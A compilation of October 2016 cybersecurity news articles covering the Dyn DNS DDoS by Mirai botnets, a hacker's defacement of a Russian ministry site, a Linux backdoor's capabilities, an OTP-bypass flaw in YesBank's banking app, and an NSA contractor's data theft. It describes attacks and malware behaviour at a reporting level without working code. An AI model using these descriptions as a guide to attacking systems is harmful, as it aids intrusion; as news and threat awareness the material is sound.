Paolo Cardoso, MA – With over 10 years of experience in Public Diplomacy and Business Intelligence, and having developed several strategic investment projects in the fields of Security, Defense and Energy in Kosovo, Bulgaria, Poland, Ukraine, Armenia, Georgia and Russian Federation, today he is the President and Co-founder of the Portuguese Euro-Atlantic Diplomacy Agency, and an Intelligence Analyst at Global Intelligence Insight.

American hacker The Jester defaced a Russian Government website
23.10.2016 securityaffairs Hacking

The popular American hacker The Jester defaced a Russian Government website in retaliation for the recent attacks against US targets.
We are in the middle of a battle in the cyberspace, with the advent of Presidential elections experts observed an intensification of the hacking attacks.

While hackers target parties and personnel involved in the Presidential campaigns, the US Government threatens Russia is blaming its cyber army for the attacks.

There aren’t only nation state actors involved in the battle, there are also hacktivists and patriotic hackers that could power cyber attacks against the adversary.

This week, hackers from NewWorldHackers crew and Anonymous targeted the Dyn DNS service to launch a message to Russia, and in the same hours, the notorious American cyber vigilante The Jester has defaced the website of the Russian Ministry of Foreign Affairs, MID.ru.

The hack was not so complicated for the expert hacker that has found a flaw in the website and exploited it to hack the Russian Government portal.

The Jester targeted the website of the Russian Government in retaliation for attacks against the American entities.

The popular hacker gained access to the Russian government ministry’s website and posted the following message:

“Stop attacking Americans.”

“Comrades! We interrupt regular scheduled Russian Foreign Affairs Website programming to bring you the following important message,” he wrote. “Knock it off. You may be able to push around nations around you, but this is America. Nobody is impressed.”

“His hacking of the website included this gag: Visitors are subjected to the ear-piercing sound of an American civil alert message — that shrieking dial tone that accompanies emergency weather broadcasts.” reported the CNNmoney.

The Jester sent a message to President Putin to blame him for lying about the involvement of Russian hackers in the recent attacks against the American organizations.
“Let’s get real, I know it’s you, even if by-proxy, and you know it’s you,” he wrote. “Now, get to your room. Before I lose my temper.”
JΞSTΞR ✪ ΔCTUAL³³º¹ @th3j35t3r
#ICYMI MSG 'From Russia with Love' - I'm Jester & I approve this message via the Russian Foreign Affairs Website >> http://bit.ly/2egvpiM
20:32 - 22 Ott 2016
81 81 Retweet 151 151 Mi piace
In the past, The Jester vigilante has conducted several operations against jihadist communities online. The popular hacker said the CNNMoney journalists he chose to attack the Russian Government Website in response to the massive DDoS against the Dyn DNS service that cut off a large portion of US netizens from the Internet.

“I wanted to poke them in the eye and stop feeling like US is just taking it on the chin. Again,” he said. “I’m not gonna sit around watching these f—-rs laughing at us.”
“It’s 4 a.m. in Moscow right now and a weekend. I’m hoping they can’t fix the hole til Monday,” he said.
“Think of this as a professional courtesy,” his public warning states. “Or if you prefer message from ‘USA with love.'”

Linux.BackDoor.FakeFile.1, a new Linux backdoor in the wild
23.10.2016 securityaffairs Virus

Security researchers at the security firm Doctor Web have spotted a new Linux backdoor dubbed Linux.BackDoor.FakeFile.1 in the wild.
Security firms continue to observe an increasing number of malware specifically designed to target Linux-based systems.

Linux, like any other Operating System, could be infected by malicious codes designed to compromise the hosts and gain the control over them.

Linux architectures are everywhere; it is quite easy for crooks to find vulnerable Linux servers exposed on the Internet or poorly designed Internet of Things devices that are not properly configured or protected.

It is normal for cyber criminals focus their efforts on hacking Linux systems too. Linux malware is a natural evolution of the threat landscape because the Linux OS is preferred platform within data centers, cloud infrastructure for businesses, and application servers.

Linux is also the core of Android devices and many other embedded systems.

The last malware observed in the wild is Linux.BackDoor.FakeFile.1, it was spotted by experts at security firm DrWeb.

The Linux.BackDoor.FakeFile.1 Trojan spreads through PDF, Microsoft, or Open Office documents.

When the victims launch trigger the execution of the malware, it saves itself to the folder .gconf/apps/gnome-common/gnome-common in the user’s home directory.

Then the Linux.BackDoor.FakeFile.1 search for a hidden file, whose name matches the file name of the malware, and replaces the executable file with its code.

“For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv .AnyName.pdf AnyName.pdf. If the file is not found, Linux.BackDoor.FakeFile.1 creates it and opens it in the program gedit.” reads the analysis published by DrWeb.

linux backdoor Linux.BackDoor.FakeFile.1
The malware checks the installed Linux distribution, for every distro that is not the openSUSE, it writes a command to the file <HOME>/.profile or the file <HOME>/.bash_profile to gain persistence. The next step it the retrieving of the configuration data from its file and its decryption, then the Trojan launches the following threads:

A first thread shares communicate with the command and control (C&C) server.
A second thread monitors the duration of the connection that will be shut down after 30 minutes without activity.
Below the complete list of the Linux.BackDoor.FakeFile.1 abilities:

Send the C&C server the quantity of messages transferred during the session;
Send a list of the contents of the specified folder;
Send the C&C server the specified file or a folder with all its contents;
Delete a directory;
Delete a file;
Rename a folder;
Remove itself;
Launch a new copy of a process;
Close the current session;
Establish backconnect and run sh;
Terminate backconnect;
Open the executable file of the process for writing;
Close the process file;
Create a file or folder;
Write the transmitted values to a file;
Obtain the names, permissions, sizes, and creation dates of files in the specified directory;
Set 777 privileges on the specified file;
Terminate the backdoor’s operation.
The researchers from DrWeb highlighted that the Linux.BackDoor.FakeFile.1 does not require root privileges to work, it operates with the current user rights.

Technical details of this Linux backdoor are available here.

NewWorldHacking and Anonymous behind massive DDoS attack on Dyn DNS service
22.10.2016 securityaffairs Attack

NewWorldHacking & Anonymous powered the massive DDoS attack against the Dyn DNS service that caused a serious Internet outage for many netizens.
The cyber attacks against the Dyn DNS service that affected a huge portion of Internet users in the US is monopolizing the media.

IT security experts have no doubts, hackers powered the massive DDoS attack with a huge botnet composed of IoT devices infected by the Mirai malware.

We are all trying to discover who is behind the attack and which is its motivation. On Friday, while the massive DDoS attack was creating the panic among netizens on the Internet, WikiLeaks invited its supporters to stop the offensive.

Visualizza l'immagine su Twitter

WikiLeaks ✔ @wikileaks
Mr. Assange is still alive and WikiLeaks is still publishing. We ask supporters to stop taking down the US internet. You proved your point.
23:09 - 21 Ott 2016
45.110 45.110 Retweet 30.150 30.150 Mi piace
WikiLeaks confirmed that its supporters launched the massive DDoS attack to protest against the decision of the Ecuadorian government’s to cut off the Internet connection of the WikiLeaks founder Julian Assange due to the US Political election leaks.
Yesterday evening I reached the hacking collective NewWorldHacking via Twitter asking them more information about the attack.
The hackers confirmed me that they started the massive attack against the Dyn DNS service, anyway, they were not alone.
According to the NewWorldHacking, many other groups linked to the Anonymous collective participated in the attack.
When I asked which Anon groups were involved they replied me that many crews targeted the Dyn DNS service.
“Anonymous, Pretty much all of Anonymous” sais NewWorldHacking.
They confirmed me that they are testing the capability of their botnet, highlighting that the DDoS attack against the Dyn DNS Service was carried with the Mirai botnet alongside with other booters.
Most interesting is the motivation that they provided me. Not only the Assange’s case. They told me that the attack is also a message for the Russian Government.

“If Russia is against the U.S we are against Russia. This is were we draw the line, we are sending a warning message to Russia. “

The information I collected seems to be in line with the statements that the hacktivist groups Anonymous and the NewWorldHacking released to the Politico.

Indian Banks fear a security breach that affected up to 3.25 million cards
22.10.2016 securityaffairs Crime

A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards.
A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards (0.5 percent of the nearly 700 million debit cards issued by banks in India).

“A slew of banks in India are replacing or asking their customers to change security codes of as many as 3.25 million debit cards due to fears that the card data may have been stolen in one of the country’s largest-ever cyber security incidents.” reported the Reuters.

In September, several banks’ customers reported to Visa, Mastercard, and RuPay (National Payments Corp of India (NPCI)) fraudulent activities involving their debit cards. According to the chief of NPCI, the fraudulent transactions spotted by the clients were prevalently observed in China and the United States.

A.P. Hota, NPCI Chief Executive, explained that one of the payment switch provider’s systems might have been compromised. Giving a close look at the numbers behind this security breach that involved some 90 ATMs, 2.65 million are on Visa and MasterCard platforms.

Both Visa and Mastercard issued a statement to confirm that their networks had not been hacked and confirmed their support to the ongoing investigation.

The switches are crucial components of the back-end network of a bank and are involved in ordinary ATM operations.


The card network providers already reported the issue to the affected banks that decided as a preventive measure to replace customers’ cards.

“Necessary corrective actions already have been taken and hence there is no reason for bank customers to panic.” said Hota downgrading the problem.

According to the Reuters, the NPCI did not disclose the name of the payment switch provider who was compromised, however, banking industry sources revealed that the financial institution is the Hitachi Ltd subsidiary Hitachi Payment Services, which manages ATM network processing for Yes Bank Ltd.

Yes Bank issued a statement to confirm it is reviewing the security, but its experts haven’t found any anomaly.

The State Bank of India promptly blocked debit cards of some customers after and now it was replacing those cards to prevent fraudulent activities.

The Reuters provided further details about a possible impact on the Indian bank customers:

“Complaints of fraudulent cash withdrawals affected a total 641 customers of 19 banks, and the money involved was 13 million rupees ($194,612), according to NPCI.” reported the Reuters.

“ICICI Bank (ICBK.NS), HDFC Bank (HDBK.NS) and Axis Bank (AXBK.NS) – the top three private sector lenders – confirmed in separate statements some of their customers’ card accounts had been possibly breached after use at outside ATMs. The banks said they had advised the clients to change their PINs.”

“Standard Chartered’s (STAN.L) Indian unit has also begun to re-issue debit cards for some customers”

An Army of Million Hacked IoT Devices Almost Broke the Internet Today
22.10.2016 thehackernews Hacking
A massive Distributed Denial of Service (DDoS) attack against Dyn, a major domain name system (DNS) provider, broke large portions of the Internet on Friday, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
But how the attack happened? What's the cause behind the attack?
Exact details of the attack remain vague, but Dyn reported a huge army of hijacked internet-connected devices could be responsible for the massive attack.
Yes, the same method recently employed by hackers to carry out record-breaking DDoS attack of over 1 Tbps against France-based hosting provider OVH.
According to security intelligence firm Flashpoint, Mirai bots were detected driving much, but not necessarily all, of the traffic in the DDoS attacks against DynDNS.
Mirai is a piece of malware that targets Internet of Things (IoT) devices such as routers, and security cameras, DVRs, and enslaves vast numbers of these compromised devices into a botnet, which is then used to conduct DDoS attacks.
Since the source code of Mirai Botnet has already made available to the public, anyone can wield DDoS attacks against targets.
This time hackers did not target an individual site, rather they attacked Dyn that many sites and services are using as their upstream DNS provider for turning internet protocol (IP) addresses into human-readable websites.
The result we all know: Major sites and services including Twitter, GitHub, Reddit, PayPal, Amazon, AirBnb, Netflix, Pinterest, and so on, were among hundreds of services rendered inaccessible to Millions of people worldwide for several hours on Friday.
"Flashpoint has confirmed that at least some of the devices used in the Dyn DNS attacks are DVRs, further matching the technical indicators and tactics, techniques, and procedures associated with previous known Mirai botnet attacks," Flashpoint says in a blog post.
This type of attack is notable and concerning because it largely consists of unsecured IoT devices, which are growing exponentially with time. These devices are implemented in a way that they cannot easily be updated and thus are nearly impossible to secure.
Manufacturers majorly focus on performance and usability of IoT devices but ignore security measures and encryption mechanisms, which is why they are routinely being hacked and widely becoming part of DDoS botnets used as weapons in cyber attacks.
An online tracker of the Mirai botnet suggests there are more than 1.2 Million Mirai-infected devices on the Internet, with over 166,000 devices active right now.
In short, IoT botnets like Mirai are growing rapidly, and there is no easy way to stop them.
According to officials speaking to Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks hitting DynDNS, but none of the agencies yet speculated on who might be behind them.

Massive DDoS attack against Dyn DNS service, how and why
22.10.2016 securityaffairs Attack

A massive DDoS attack targeted the Dyn DNS service and caused an extended Internet outage. How the attackers powered the attack?
Yesterday a massive DDoS attack targeted the DNS service of the Dyn company, one of the most authoritative domain name system (DNS) provider, and caused an extended Internet outage. A large portion of Interner users was not able to reach most important web services, many websites like including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify were down for netizens in the US.

What happened? Who his behind the attack?

The fear of cyber attack on a global scale brought people in the panic, yesterday a large portion of users have probably understood that the Internet architecture is a resource that could be targeted by hackers with serious and unpredictable consequences.

But how the attack happened? What’s the cause behind the attack?

We still ignore the exact dynamic of the attack, neither who is the responsible, the unique certainty is that the Dyn DNS Service was flooded by a devastating wave of requests originated by million of compromised IoT devices. The Dyn company reported a huge army of hijacked Internet of Things devices could be abused by attackers to power the massive DDoS attack.

The news confirmed the dangerous trend observed in the recent attacks against the Brian Krebs’s website and the French hosting provider OVH that peaked 1Tbps.
The security intelligence firm Flashpoint published an interesting post on the massive DDoS in which confirm that its experts have observed the Mirai bots driving the attack against DynDNS.

“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “

Below the Key Findings of the report published by Flashpoint

Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
This is not surprising if we consider that the source code of the botnet was leaked of the popular criminal hacker forum Hackforum earlier October by a user with moniker “Anna-senpai” that shared the link to the source code of the malware “Mirai.”

“The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed ‘Mirai’ spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.” reported Krebs.

Dyn DNS service mirai-hf-580x232-source-brian-krebs

The Mirai Botnet was first spotted by the researcher MalwareMustDie this summer targeting IoT devices, it mainly targets connected objects such as routers, CCTV, and DVRs.

The Mirai malware target Internet of Things (IoT) devices using the credential factory settings, a circumstance that is quite common in the wild.

The availability of the source code of Mirai Botnet in the wild theoretically made possible everyone to power a botnet.

I confess you that I believe the leak of the source code of such kind of botnet could be also part of a wider strategy of a certain category of attackers that intend to power massive attacks making impossible the attribution.

Watch out! The Mirai botnet that powered the attack against the Dyn DNS service is not the same used against Krebs’s site and OVH.

“While Flashpoint has confirmed that Mirai botnets were used in the October 21, 2016 attack against Dyn, they were separate and distinct botnets from those used to execute the DDoS attacks against “Krebs on Security” and OVH. Earlier this month, “Anna_Senpai,” the hacker operating the large Mirai botnet used in the Krebs DDoS, released Mira’s source code online.” continues Flashpoint “Since this release, copycat hackers have used the malware to create botnets of their own in order to launch DDoS attacks.”

It is unknown if the attacks against Dyn DNS are linked to the DDoS attacks against Krebs, OVH, or other previous attacks.

The attack against a DNS aims to obtain a wide effect, in the specific case many sites and services are using Syn as their upstream DNS provider.

If you are interested to know more about the diffusion of the Mirai Botnet you can use this online tracker that reports more than 1.2 Million connected devices infected by the Mirai code in the wild.

Dyn DNS service mirai-botnet ddos

According to the Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks against the Dyn DNS service.

We have no indication about the possible culprit, I personally believe that the leakage of the Mirai botnet in the wild and this last massive attack have something in common and there is a specific strategy of a persistent attacker behind the events.

Chinese hackers targeted officials visiting the USS Ronald Reagan vessel
22.10.2016 securityaffairs Hacking

Experts from the cyber security firm FireEye discovered a spear phishing campaign launched against visitors to the Ronald Reagan vessel in South China Sea.
Chinese hackers targeted foreign government personnel who visited a US aircraft carrier the day before a contentious international court ruling on the South China Sea,

According to the FireEye cyber security firm, Chinese hackers targeted US aircraft carrier. The hackers launched an attack against visitors to a US vessel the day before (July 11, 2016) a contentious international court ruling on the South China Sea.
According to the experts at the FireEye’s iSight unit, the Chinese hackers powered a spear phishing attack that leveraged on messages with a malicious document as an attachment. The document impersonating an official message addressed to officials visiting the USS Ronald Reagan, a nuclear-powered aircraft carrier which conducted patrols of the South China Sea in July.


The document appears as an official message that was sent to officials visiting the nuclear-powered aircraft carrier USS Ronald Reagan. The Ronald Reagan aircraft carrier was used by the US Government to patrol the South China Sea in July.

The document allowed the attacker to infect victims with the Enfal malware, which can be used by attackers as a spyware or to download further malicious payloads on the machine.

According to FireEye, the same hackers are responsible for other attacks against US and Vietnamese national defence computer networks.

The Financial Times that reported the discovery made by FireEye, confirmed the absence of direct evidence to link the attack to a Chinese nation-state actor.The researcher discovered that the command and control server used by the attacker was already used in the past by the China-based group.

“Many governments and militaries in Southeast Asia lack cyber security controls that can effectively match these elevated threats,” said Bryce Boland, FirEye’s Asia-Pacific chief technology officer.

“For example, personal webmail and unmanaged devices aren’t unusual, and many organisations lack the technology to detect unique attacks which haven’t been seen before.”

At the time I was writing it is still unclear if hackers have compromised classified information, nor that the hackers have interfered with the vessel’s operations in the South China Sea.

“The official said unclassified information about logistics was often shared with contractors and foreign governments to support port visits for ships.” reported the FT.

Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
21.10.2016 thehackernews Attack
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
Cyber attacks are getting evil and worst nightmare for companies day-by-day, and the Distributed Denial of Service (DDoS) attack is one such attacks that cause a massive damage to any service.
Recently, the Internet witnessed a record-breaking largest DDoS attack of over 1 Tbps against France-based hosting provider OVH, and now the latest victim of the attack is none other than Dyn DNS provider.
A sudden outage of popular sites and services, including Twitter, SoundCloud, Spotify, and Shopify, for many users, is causing uproar online. It's because of a DDoS attack against the popular Domain Name System (DNS) service provider Dyn, according to a post on Ycombinator.
DNS act as the authoritative reference for mapping domain names to IP addresses. In other words, DNS is simply an Internet's phone book that resolves human-readable web addresses, like thehackernews.com, against IP addresses.
Dyn DNS is used by many websites and services as their upstream DNS provider, including Twitter, Spotify, SaneBox, Reddit, Box, Github, Zoho CRM, PayPal, Airbnb, Freshbooks, Wired.com, Pinterest, Heroku and Vox Media properties.
All of these sites and services are reportedly experiencing outages and downtime, either completely or partially.
Here's an internet outage map from Level3:
According to Dyn DNS, the DDOS started at 11:10 UTC and is mostly affecting its customers in the East Coast of the United States, specifically Managed DNS customers.
"We are aware of the ongoing service interruption of our Managed DNS network. For more information visit our status page," Dyn tweeted.
At the time, it's not clear who is behind this DDoS attack, but the company said its engineers are working on "mitigating" the issue.
Here's the statement posted by Dyn on its website:
"This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.
Customers with questions or concerns are encouraged to reach out to our Technical Support Team."
What websites are down for you? Let us know in the comments below.
We'll update the story as soon as we get to hear more about the attack. Stay Tuned!

US users were not able to reach Twitter and other sites due to DDoS on Dyn DNS Service
21.10.2016 securityaffairs Attack

A severe distributed denial-of-service (DDoS) it targeting the Managed DNS infrastructure of cloud-based Internet performance management company Dyn.
A severe distributed denial-of-service (DDoS) it targeting the Managed DNS infrastructure of cloud-based Internet performance management company Dyn.

Many users of major websites are not able to reach web services such as Twitter, GitHub, The list of affected websites includes Twitter, Etsy, GitHub, Soundcloud, PagerDuty, Spotify, Shopify, Airbnb, Intercom, and Heroku.

GitHub has notified its users that its upstream DNS provider is suffering a serious issue. In some region of the planet Twitter.com was not accessible, as reported by SecurityWeek

“At the time of writing, website availability services show that Twitter.com has been down for roughly two hours.” states a blog post published by SecurityWeeks.

Dyn confirmed the DDoS attack against its DNS service that started at 11:10 UTC. The company is still working on mitigating the attack.

“Services have been restored to normal as of 13:20 UTC.

This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Posted about 1 hour ago.
Starting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.”
Dyn DNS Service twitter-down-ddos

The attack seems to have no impact on the European and Asian Users, I live in Italy and here we had no problems in reaching the affected websites.

DDoS attacks continue to represent a serious threat against the web services and the overall Internet infrastructure.

Recent attacks powered by the Mirai botnet reached a magnitude never seen before, the attack targeting hosting provider OVH last month peaked 1 Tbps.

Early September the popular cyber security expert Bruce Schneier published an interesting post titled “Someone Is Learning How to Take Down the Internet” that reveals an escalation of cyber attacks against service providers and companies responsible for the basic infrastructure of the Internet.

We are referring to coordinated attacks that experts consider a sort of tests to evaluate the resilience of most critical nodes of the global Internet. The attacks experienced by the companies request a significant effort and huge resources, a circumstance that suggests the involvement of a persistent attacker like a government, and China is the first suspect.

“Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they’re used to seeing. They last longer. They’re more sophisticated. And they look like probing.” wrote Schneier.

“I am unable to give details, because these companies spoke with me under a condition of anonymity. But this all is consistent with what Verisign is reporting. Verisign is the registrar for many popular top-level Internet domains, like .com and .net. If it goes down, there’s a global blackout of all websites and e-mail addresses in the most common top-level domains. Every quarter, Verisign publishes a DDoS trends report. While its publication doesn’t have the level of detail I heard from the companies I spoke with, the trends are the same: “in Q2 2016, attacks continued to become more frequent, persistent, and complex.”

It is clear that attackers aim to cause a global blackout of the most common top-level domains paralyzing a large portion of the Internet.

Schneier, who has spoken with companies that faced the attacks, pointed out powerful DDoS attacks that attacks that stand out of the ordinary for their methodically escalating nature.

Cyber Criminal can easily get access to your YesBank Internet Banking using stolen Debit/Credit Card Number and PIN
21.10.2016 securityaffairs  Cyber

A security researcher disclosed a vulnerability in the online banking service of the YesBank that promptly fixed the issue.
I am a customer of YesBank and I hold my savings account with them. I also use the YesBank’s online banking application and I strongly feel that the application of the bank must be secured. So, as a responsible client, I disclosed the vulnerability to YesBank which I recently found in their application. And I would like to thank YesBank for fixing this issue immediately.
For those who do not know about YesBank, you can read about the bank on wiki.
“YES BANK is India’s fifth largest private sector Bank, founded in 2004. Yes Bank is the only Greenfield Bank licence awarded by the RBI in the last two decades. YES BANK is a “Full Service Commercial Bank”, and has steadily built a Corporate, Retail & SME Banking franchise, Financial Markets, Investment Banking, Corporate Finance, Branch Banking, Business and Transaction Banking, and Wealth Management business lines across the country.”
I regularly perform the penetration testing on applications at SecureLayer7 and recently, I stumbled on a very simple bug in the YesBank online banking application (referred as YesBank in the remaining article). YesBank provides a good number of features to million of banking users. Among these features, I found that the user account password reset feature was vulnerable to one of the OWASP’s Top 3 vulnerability, i.e. Injections.

This vulnerability is caused by poor input validation of the application. Consequently, attacker can exploit this vulnerability to bypass the OTP process to reset the bank account password. To exploit this vulnerability, attacker needs the information of the victim bank account, for example their ATM number, ATM Pin, etc.
Several Indian banks are issuing an advisory to their customers, asking them to change their security code (more popularly known as ATM pin) or better replace the card, by Indian media reports
Once the attacker gathers all the information required to exploit this vulnerability, he can gain the access to the Online Banking Application account by resetting the original password of the user.

The Proof of Concept
To execute the payload successfully switch OFF or turn ON the flight mode of the mobile. (Banking user information is blurred for security reasons)

Vulnerability Timeline:
1) Vulnerability reported on 21st of Sept, 2016 to YesBank

2) Re-tested Vulnerability on 20th October 2016 and it was patched

I always recommend implementing the universal input validations for the commonly known vulnerabilities, especially banking application should have all types of input validations on the un-trusted user inputs.

Reference : http://blog.securelayer7.net/yesbank-banking-application-password-reset-otp-bypass-vulnerability/

US contractor stole an astonishing quantity of data, including Equation Group tools
21.10.2016 securityaffairs BigBrothers

The US DoJ has charged the US contractor Harold Thomas Martin with theft of secret documents and highly classified government material.
A couple of months ago, the FBI announced the arrest of an NSA contractor, Harold Thomas Martin III, over a massive secret data theft.

The US DoJ has charged Harold Thomas Martin (51) with theft of secret documents and highly classified government material.
According to a court complaint, the stolen data include source codes developed by the NSA to its hacking campaigns against foreign governments.
The DoJ’s chief national security prosecutor John Carlin revealed that the US contractor was employed by Booz Allen Hamilton. Booz Allen Hamilton is the same defense contractor that employed the notoriousEdward Snowden at the time the whistleblower when he disclosed the mass surveillance program conducted by the NSA on a global scale.
Now, according to a new court document filed this week, the FBI seized at least 50 terabytes of data from the suspect that has stolen from government systems since 1996.According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”

According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”

“The defendant violated that trust by engaging in wholesale theft of classified government documents and property — a course of felonious conduct that is breathtaking in its longevity and scale,” prosecutors said.“The defendant was in possession of an astonishing quantity of marked classified documents which he was not entitled to possess, including many marked,” “The government anticipates that the charges will include violations of the Espionage Act, an offense that carries significantly higher statutory penalties and advisory guideline ranges than the charges listed in the complaint,” prosecutors added.

US contractor cyber heist

This volume of classified information stolen by the man could be far larger than Edward Snowden cyber heist. The investigators have discovered “six full bankers’ boxes” worth of documents, many of which were classified as “Secret” and “Top Secret.”

“The document appears to have been printed by the Defendant from an official government account,” read the court documents. “On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.”

The New York Times reported that the stolen documents also included the NSA’s top secret hacking tools that were leaked online by the Shadow Brokers group who claimed the responsibility for the Equation Group hack.

According to the NY Times, the FBI has found forensic evidence that the hacking tools leaked online by the group had actually been on Martin’s computer.

Why did the US contractor steal the document?

It is still a mystery, people who know him describe him as a patriotic, a circumstance that suggests he would never have given classified information to another country. He never had a specific interest in politics, the FBI doesn’t exclude he might have sold the precious information for money.

“His annual salary in recent years has exceeded $100,000 and he owns his house without a mortgage. But he has long bought expensive suits and Rolex watches, according to an old acquaintance, and a person familiar with his finances says he has struggled with debt. Court records show one past lien, an $8,997 state tax bill imposed in 2000 and not paid off until 2014.” reported the NYT.

Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Today in Baltimore.

Ex-NSA Contractor Stole 50 TB of Classified Data; Includes Top-Secret Hacking Tools
21.10.2016 thehackernews BigBrothers
Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency.
Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades.
The stolen data that are at least 500 million pages of government records includes top-secret information about "national defense." If all data stolen by Martin found indeed classified, it would be the largest NSA heist, far bigger than Edward Snowden leaks.
According to the new filing, Martin also took "six full bankers’ boxes" worth of documents, many of which were marked "Secret" and "Top Secret." The stolen data also include the personal information of government employees. The stolen documents date from between 1996 through 2016.
"The document appears to have been printed by the Defendant from an official government account," the court documents read. "On the back of the document are handwritten notes describing the NSA's classified computer infrastructure and detailed descriptions of classified technical operations."
Former NSA Insider Could Be Behind The Shadow Brokers
It's not clear exactly what Martin allegedly stole, but The New York Times reported Wednesday that the stolen documents also included the NSA's top secret hacking tools posted online by a supposed hacking group, calling itself Shadow Brokers, earlier this year.
Earlier this summer, Shadow Brokers claimed to have infiltrated NSA servers and stolen enormous amounts of data, including working exploits and hacking tools.
The NY Times report suggests that the FBI has found forensic evidence that the hacking tools and cyber-weapons posted online by the alleged hacking group had actually been on a contractor's machine.
NSA Contractor to Face Espionage Charges
Martin, a former Booz Allen Hamilton staffer like NSA whistleblower Snowden, should remain locked up and the government also plans to charge him with violations of the Espionage Act, Prosecutors said.
If convicted, one can face the death penalty.
Martin has "obtained advanced educational degrees" and has also "taken extensive government training courses on computer security," including in the areas of encryption as well as secure communications.
A former US Navy veteran, Martin allegedly used a sophisticated software that "runs without being installed on a computer system and provides anonymous Internet access, leaving no digital footprint on the Machine."
It's believed that Martin was using TAILS operating system or another USB-bootable operating system in conjunction with Tor or a VPN that would not leave any forensic evidence of his computer activities.
Martin's motives are still unclear, but among the seized documents, investigators uncovered a letter sent to Martin's colleagues in 2007, in which he criticized the information security practices of government and refers to those same co-workers as "clowns."
The letter reads: "I will leave you with this: if you do not get obnoxious, obvious, and detrimental to my future, then I will not bring you; into the light, as it were. If you do, well, remember that you did it to yourselves."
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Friday in Baltimore.

MBRFilter — Open Source Tool to Protect Against 'Master Boot Record' Malware
21.10.2016 thehackernews Virus
Ransomware threat has risen exponentially so much that ransomware authors have started abusing the MBR in their attacks to lock down your entire computer instead of just encrypting your important files on hard drive.
Talos team at Cisco Systems has released a free, open-source tool that protects the master boot record (MBR) sector of computers from modification by bootkits, ransomware, and other malicious attacks.
Master Boot Record (MBR) is the first sector (512 bytes) on your Hard drive that stores the bootloader, a piece of code that is responsible for booting the current Operating System.
Technically, Bootloader is first code that gets executed after system BIOS that tells your computer what to do when it start.
An advanced malware program, such as rootkit and bootkit, leverages this process to infect computers by modifying the MBR.
A boot malware or bootkits has the ability to install ransomware or other malicious software into your Windows kernel, which is almost impossible to detect, and thus takes unrestricted and unauthorized access to your entire computer.
So, the best way to protect your computer against such bootkits is to restrict your MBR to rewrite or overwrite by an unauthorized software.
Cisco's Talos team free tool does the same.
Dubbed MBRFilter, the tool is nothing more than a signed system driver that puts the MBR into a read-only state, preventing any software or malware from modifying data of the MBR section.
You can watch the video demonstration of MBRFilter in action.

MBRFilter will safeguard your computer against MBR-targeting malware, like the Petya ransomware, Satana, or HDDCryptor ransomware.
"MBRFilter is a simple disk filter based on Microsoft’s diskperf and classpnp example drivers," the team said in a blog post. "It can be used to prevent malware from writing to Sector 0 on all disk devices connected to a system. Once installed, the system will need to be booted into Safe Mode in order for Sector 0 of the disk to become accessible for modification."
MBRFilter is available for both Windows 32-bit and 64-bit platforms, and Cisco has open-sourced its source code on GitHub.

Over 43 Million Weebly Accounts Hacked; Foursquare Also Hit By Data Breach
21.10.2016 thehackernews Hacking
2016 is the year of data breaches that has made almost every major companies victims to the cyber attacks, resulting in compromise of over billion of online users accounts.
Weebly and Foursquare are the latest victims of the massive data breach, joining the list of "Mega-Breaches" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, Dropbox, and the biggest one -- Yahoo.
Details for over 43 Million users have been stolen from the San Francisco-based website building service Weebly, according to breach notification site LeakedSource, who had already indexed a copy of the stolen data that it received from an anonymous source.
In addition, LeakedSource posted details of the cyber attack in its blog post on Thursday explaining what happened. The attack believed to have been carried out in February 2016.
